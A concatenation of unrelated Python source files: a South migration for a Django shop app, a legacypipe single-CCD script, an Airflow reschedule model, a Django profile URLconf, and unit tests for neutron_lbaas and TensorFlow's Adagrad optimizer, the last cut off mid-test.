{'max_length': '100'}) }, 'generic.assignedkeyword': { 'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'}, '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': "orm['generic.Keyword']"}), 'object_pk': ('django.db.models.fields.IntegerField', [], {}) }, 'generic.keyword': { 'Meta': {'object_name': 'Keyword'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}), 'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}) }, 'generic.rating': { 'Meta': {'object_name': 'Rating'}, 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_pk': ('django.db.models.fields.IntegerField', [], {}), 'value': ('django.db.models.fields.IntegerField', [], {}) }, 'pages.page': { 'Meta': {'ordering': "('titles',)", 'object_name': 'Page'}, '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'in_footer': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.AssignedKeyword']"}), 
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}), 'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['pages.Page']"}), 'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}), 'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}), 'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}), 'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}) }, 'shop.cart': { 'Meta': {'object_name': 'Cart'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}) }, 'shop.cartitem': { 'Meta': {'object_name': 'CartItem'}, 'cart': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Cart']"}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}), 'quantity': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20'}), 'total_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'url': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'shop.category': { 'Meta': {'ordering': "('_order',)", 'object_name': 'Category', '_ormbases': ['pages.Page']}, 'combined': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'content': ('mezzanine.core.fields.RichTextField', [], {}), 'options': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product_options'", 'blank': 'True', 'to': "orm['shop.ProductOption']"}), 'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'}), 'price_max': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'price_min': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}), 'sale': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Sale']", 'null': 'True', 'blank': 'True'}) }, 'shop.discountcode': { 'Meta': {'object_name': 'DiscountCode'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'discountcode_related'", 'blank': 'True', 'to': 
"orm['shop.Category']"}), 'code': ('cartridge.shop.fields.DiscountCodeField', [], {'unique': 'True', 'max_length': '20'}), 'discount_deduct': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_exact': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}), 'free_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'min_purchase': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'uses_remaining': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'valid_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'valid_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}) }, 'shop.order': { 'Meta': {'ordering': "('-id',)", 'object_name': 'Order'}, 'additional_instructions': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'billing_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}), 'billing_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}), 'billing_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}), 'billing_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'discount_code': ('cartridge.shop.fields.DiscountCodeField', [], {'max_length': '20', 'blank': 'True'}), 'discount_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'item_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'key': ('django.db.models.fields.CharField', [], {'max_length': '40'}), 'shipping_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}), 'shipping_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}), 'shipping_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_street': 
('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'shipping_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}), 'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}), 'time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}), 'total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'transaction_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'user_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}) }, 'shop.orderitem': { 'Meta': {'object_name': 'OrderItem'}, 'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Order']"}), 'quantity': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20'}), 'total_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}) }, 'shop.product': { 'Meta': {'object_name': 'Product'}, 'available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Category']", 'symmetrical': 'False', 'blank': 'True'}), 'content': ('mezzanine.core.fields.RichTextField', [], {}), 'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.AssignedKeyword']"}), 'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}), 'num_in_stock': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'rating': ('mezzanine.generic.fields.RatingField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.Rating']"}), 'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}), 'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_products_rel_+'", 'blank': 'True', 'to': "orm['shop.Product']"}), 'sale_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sale_id': ('django.db.models.fields.IntegerField', [], 
{'null': 'True'}), 'sale_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'sale_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}), 'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}), 'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'upsell_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'upsell_products_rel_+'", 'blank': 'True', 'to': "orm['shop.Product']"}) }, 'shop.productaction': { 'Meta': {'unique_together': "(('product', 'timestamp'),)", 'object_name': 'ProductAction'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actions'", 'to': "orm['shop.Product']"}), 'timestamp': ('django.db.models.fields.IntegerField', [], {}), 'total_cart': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'total_purchase': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'shop.productimage': { 'Meta': {'ordering': "('_order',)", 'object_name': 'ProductImage'}, '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'file': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['shop.Product']"}) }, 'shop.productoption': { 'Meta': {'object_name': 'ProductOption'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}), 'type': ('django.db.models.fields.IntegerField', [], {}) }, 'shop.productvariation': { 'Meta': {'ordering': "('-default',)", 'object_name': 'ProductVariation'}, 'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.ProductImage']", 'null': 'True', 'blank': 'True'}), 'num_in_stock': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'option1': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}), 'option2': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'variations'", 'to': "orm['shop.Product']"}), 'sale_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sale_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'sale_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'sale_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 
'True'}), 'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20', 'unique': 'True', 'null': 'True', 'blank': 'True'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}) }, 'shop.sale': { 'Meta': {'object_name': 'Sale'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'sale_related'", 'blank': 'True', 'to': "orm['shop.Category']"}), 'discount_deduct': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_exact': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'valid_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'valid_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}) }, 'sites.site': { 'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"}, 'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } complete_apps = ['shop']
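# --- hedged sketch (not part of the migration above) ---
# The `models` dict is South's frozen ORM snapshot for the `shop` app: a data
# migration queries the models as they existed at this point in history through the
# `orm` argument rather than importing the live models.  The class below sketches
# what a separate data-migration module could look like; the filter and field
# values are hypothetical.
from south.v2 import DataMigration


class Migration(DataMigration):

    def forwards(self, orm):
        # orm['app.Model'] resolves against the frozen definitions above.
        for product in orm['shop.Product'].objects.filter(available=False):
            product.status = 1
            product.save()

    def backwards(self, orm):
        pass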
''' This script runs the legacypipe code on a single CCD. ''' from __future__ import print_function import numpy as np from legacypipe.survey import LegacySurveyData from legacypipe.runbrick import get_parser, get_runbrick_kwargs, run_brick class FakeLegacySurveyData(LegacySurveyData): def filter_ccd_kd_files(self, fns): if self.no_kd: return [] return fns def main(): from astrometry.util.ttime import Time t0 = Time() parser = get_parser() parser.set_defaults(wise=False) parser.add_argument('expnum', type=int, help='Exposure number') parser.add_argument('ccdname', help='CCD name (eg: "N4")') opt = parser.parse_args() optdict = vars(opt) verbose = optdict.pop('verbose') expnum = optdict.pop('expnum') ccdname = optdict.pop('ccdname') #print('optdict:', optdict) survey = FakeLegacySurveyData(survey_dir=opt.survey_dir, output_dir=opt.output_dir, cache_dir=opt.cache_dir) survey.no_kd = False ccds = survey.find_ccds(expnum=expnum, ccdname=ccdname) if len(ccds) == 0: print('Did not find EXPNUM', expnum, 'CCDNAME', ccdname) return -1 # Force the CCDs survey.ccds = ccds survey.no_kd = True ccd = ccds[0] print('Found CCD', ccd) awcs = survey.get_approx_wcs(ccd) ra,dec = awcs.radec_center() h,w = awcs.shape rr,dd = awcs.pixelxy2radec([1,1,w,w], [1,h,h,1]) # Rotate RAs to be around RA=180 to avoid wrap-around rotra = np.fmod((rr - ra + 180) + 360, 360.) # assume default pixscale pixscale = 0.262 / 3600 W = int(np.ceil((rotra.max() - rotra.min()) * np.cos(np.deg2rad(dec)) / pixscale)) H = int(np.ceil((dd.max() - dd.min()) / pixscale)) print('W, H', W, H) optdict.update(survey=survey) survey, kwargs = get_runbrick_kwargs(**optdict) kwargs.update(radec=(ra,dec), width=W, height=H, bands=[ccd.filter]) #if opt.brick is None and opt.radec is None: run_brick(None, survey, **kwargs) print('Finished:', Time()-t0) if __name__ == '__main__': main()
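# --- hedged illustration (standalone, not part of the script above) ---
# The "rotate RAs to be around RA=180" step avoids the 0/360 wrap-around when the
# CCD footprint straddles RA=0: the raw corner RAs would appear to span ~360 deg,
# while the rotated values recover the true angular extent.  Values are hypothetical.
import numpy as np

ra = 0.05                                     # field centre just past RA=0
rr = np.array([359.9, 0.1])                   # corner RAs straddling the wrap
print(rr.max() - rr.min())                    # 359.8 deg -- misleading span
rotra = np.fmod((rr - ra + 180) + 360, 360.)  # same shift used in main()
print(rotra.max() - rotra.min())              # 0.2 deg -- true extent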
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """TaskReschedule tracks rescheduled task instances.""" from sqlalchemy import Column, ForeignKeyConstraint, Index, Integer, String, asc from airflow.models.base import ID_LEN, Base from airflow.utils.session import provide_session from airflow.utils.sqlalchemy import UtcDateTime class TaskReschedule(Base): """ TaskReschedule tracks rescheduled task instances. """ __tablename__ = "task_reschedule" id = Column(Integer, primary_key=True) task_id = Column(String(ID_LEN), nullable=False) dag_id = Column(String(ID_LEN), nullable=False) execution_date = Column(UtcDateTime, nullable=False) try_number = Column(Integer, nullable=False) start_date = Column(UtcDateTime, nullable=False) end_date = Column(UtcDateTime, nullable=False) duration = Column(Integer, nullable=False) reschedule_date = Column(UtcDateTime, nullable=False) __table_args__ = ( Index('idx_task_reschedule_dag_task_date', dag_id, task_id, execution_date, unique=False), ForeignKeyConstraint([task_id, dag_id, execution_date], ['task_instance.task_id', 'task_instance.dag_id', 'task_instance.execution_date'], name='task_reschedule_dag_task_date_fkey', ondelete='CASCADE') ) def __init__(self, task, execution_date, try_number, start_date, end_date, reschedule_date): self.dag_id = task.dag_id self.task_id = task.task_id self.execution_date = execution_date self.try_number = try_number self.start_date = start_date self.end_date = end_date self.reschedule_date = reschedule_date self.duration = (self.end_date - self.start_date).total_seconds() @staticmethod @provide_session def find_for_task_instance(task_instance, session=None): """ Returns all task reschedules for the task instance and try number, in ascending order. :param session: the database session object :type session: sqlalchemy.orm.session.Session :param task_instance: the task instance to find task reschedules for :type task_instance: airflow.models.TaskInstance """ TR = TaskReschedule return ( session .query(TR) .filter(TR.dag_id == task_instance.dag_id, TR.task_id == task_instance.task_id, TR.execution_date == task_instance.execution_date, TR.try_number == task_instance.try_number) .order_by(asc(TR.id)) .all() )
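# --- hedged usage sketch (standalone; assumes a configured Airflow metadata DB and
# an existing TaskInstance `ti`) ---
# find_for_task_instance() returns every reschedule recorded for that task try,
# ordered by primary key, i.e. in the order the reschedules happened.
from airflow.models.taskreschedule import TaskReschedule


def summarize_reschedules(ti):
    """Print one line per recorded reschedule and return how many there were."""
    reschedules = TaskReschedule.find_for_task_instance(ti)
    for tr in reschedules:
        print(tr.try_number, tr.start_date, tr.reschedule_date, tr.duration)
    return len(reschedules)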
from django.conf.urls import * from django.views.generic import TemplateView from userprofile.views import * from django.conf import settings class DirectTemplateView(TemplateView): extra_context = None def get_context_data(self, **kwargs): context = super(self.__class__, self).get_context_data(**kwargs) if self.extra_context is not None: for key, value in self.extra_context.items(): if callable(value): context[key] = value() else: context[key] = value return context urlpatterns = patterns('', # Private profile url(r'^profile/$', overview, name='profile_overview'), url(r'^profile/edit/location/$', location, name='profile_edit_location'), url(r'^profile/edit/personal/$', personal, name='profile_edit_personal'), url(r'^profile/delete/$', delete, name='profile_delete'), url(r'^profile/getcountry_info/(?P<lat>[0-9\.\-]+)/(?P<lng>[0-9\.\-]+)/$', fetch_geodata, name='profile_geocountry_info'), # Avatars url(r'^profile/edit/avatar/delete/$', avatardelete, name='profile_avatar_delete'), url(r'^profile/edit/avatar/$', avatarchoose, name='profile_edit_avatar'), url(r'^profile/edit/avatar/crop/$', avatarcrop, name='profile_avatar_crop'), url(r'^profile/edit/avatar/crop/done/$', DirectTemplateView.as_view(template_name='userprofile/avatar/done.html', extra_context = {'section': 'avatar'}), name='profile_avatar_crop_done'), # Account utilities url(r'^email/validation/$', email_validation, name='email_validation'), url(r'^email/validation/processed/$', DirectTemplateView.as_view(template_name='userprofile/account/email_validation_processed.html'), name='email_validation_processed'), url(r'^email/validation/(?P<key>.{70})/$', email_validation_process, name='email_validation_process'), url(r'^email/validation/reset/$', email_validation_reset, name='email_validation_reset'), url(r'^email/validation/reset/(?P<action>done|failed)/$', DirectTemplateView.as_view(template_name='userprofile/account/email_validation_reset_response.html'), name='email_validation_reset_response'), url(r'^password/reset/$', 'django.contrib.auth.views.password_reset', {'template_name': 'userprofile/account/password_reset.html', 'email_template_name': 'userprofile/email/password_reset_email.txt' }, name='password_reset'), url(r'^password/reset/done/$', 'django.contrib.auth.views.password_reset_done', {'template_name': 'userprofile/account/password_reset_done.html'}, name='password_reset_done'), url(r'^password/change/$', 'django.contrib.auth.views.password_change', {'template_name': 'userprofile/account/password_change.html'}, name='password_change'), url(r'^password/change/done/$', 'django.contrib.auth.views.password_change_done', {'template_name': 'userprofile/account/password_change_done.html'}, name='password_change_done'), url(r'^reset/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$', 'django.contrib.auth.views.password_reset_confirm', {'template_name': 'userprofile/account/password_reset_confirm.html'}, name="password_reset_confirm"), url(r'^reset/done/$', 'django.contrib.auth.views.password_reset_complete', {'template_name': 'userprofile/account/password_reset_complete.html'}, name="password_reset_complete"), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'userprofile/account/login.html'}, name='login'), url(r'^logout/$', 'django.contrib.auth.views.logout', {'template_name': 'userprofile/account/logout.html'}, name='logout'), # Registration url(r'^register/$', register, name='signup'), url(r'^register/validate/$', DirectTemplateView.as_view(template_name='userprofile/account/validate.html'), 
name='signup_validate'), url(r'^register/complete/$', DirectTemplateView.as_view(template_name='userprofile/account/registration_done.html', extra_context={ 'email_validation_required': hasattr(settings, "REQUIRE_EMAIL_CONFIRMATION") and settings.REQUIRE_EMAIL_CONFIRMATION }), name='signup_complete'), # Users public profile url(r'^profile/(?P<username>.+)/$', public, name='profile_public'), )
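# --- hedged sketch (standalone, not part of the URLconf above) ---
# Because every pattern above is named, links can be built with reverse() (or the
# {% url %} template tag) instead of hard-coding paths; the import matches the old
# Django API this URLconf targets, and the username is hypothetical.
from django.core.urlresolvers import reverse


def public_profile_link(username):
    # Resolves to ".../profile/<username>/"; the prefix depends on where this
    # URLconf is included in the project's root urls.py.
    return reverse('profile_public', kwargs={'username': username})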
# Copyright 2013 New Dream Network, LLC (DreamHost) # Copyright 2015 Rackspace # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import contextlib import mock from oslo_config import cfg from neutron_lbaas.agent import agent from neutron_lbaas.tests import base class TestLbaasService(base.BaseTestCase): def test_start(self): with mock.patch.object( agent.n_rpc.Service, 'start' ) as mock_start: mgr = mock.Mock() cfg.CONF.periodic_interval = mock.Mock(return_value=10) agent_service = agent.LbaasAgentService('host', 'topic', mgr) agent_service.start() self.assertTrue(mock_start.called) def test_main(self): logging_str = 'neutron.agent.common.config.setup_logging' with contextlib.nested( mock.patch(logging_str), mock.patch.object(agent.service, 'launch'), mock.patch('sys.argv'), mock.patch.object(agent.manager, 'LbaasAgentManager'), mock.patch.object(cfg.CONF, 'register_opts') ) as (mock_logging, mock_launch, sys_argv, mgr_cls, ro): agent.main() mock_launch.assert_called_once_with(mock.ANY)
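# --- hedged note (standalone, not part of the test above) ---
# contextlib.nested() only exists on Python 2; on Python 3 an equivalent stack of
# mock.patch() contexts can be entered with contextlib.ExitStack.  A rough sketch:
import contextlib
from unittest import mock


def call_with_patches(func, targets):
    """Call func(*mocks) with every dotted path in `targets` patched."""
    with contextlib.ExitStack() as stack:
        mocks = [stack.enter_context(mock.patch(t)) for t in targets]
        return func(*mocks)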
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functional tests for aggregate operations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.python.eager import context from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import test_util from tensorflow.python.ops import embedding_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import resource_variable_ops from tensorflow.python.ops import variable_scope from tensorflow.python.ops import variables from tensorflow.python.platform import test from tensorflow.python.training import adagrad class AdagradOptimizerTest(test.TestCase): def doTestBasic(self, use_locking=False, use_resource=False, use_callable_params=False): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: if use_resource: var0 = resource_variable_ops.ResourceVariable([1.0, 2.0], dtype=dtype) var1 = resource_variable_ops.ResourceVariable([3.0, 4.0], dtype=dtype) else: var0 = variables.Variable([1.0, 2.0], dtype=dtype) var1 = variables.Variable([3.0, 4.0], dtype=dtype) grads0 = constant_op.constant([0.1, 0.1], dtype=dtype) grads1 = constant_op.constant([0.01, 0.01], dtype=dtype) learning_rate = lambda: 3.0 if not use_callable_params: learning_rate = learning_rate() ada_opt = adagrad.AdagradOptimizer( learning_rate, initial_accumulator_value=0.1, use_locking=use_locking) if not context.executing_eagerly(): ada_update = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values v0_val, v1_val = self.evaluate([var0, var1]) self.assertAllClose([1.0, 2.0], v0_val) self.assertAllClose([3.0, 4.0], v1_val) # Run 3 steps of adagrad for _ in range(3): if not context.executing_eagerly(): self.evaluate(ada_update) else: ada_opt.apply_gradients(zip([grads0, grads1], [var0, var1])) # 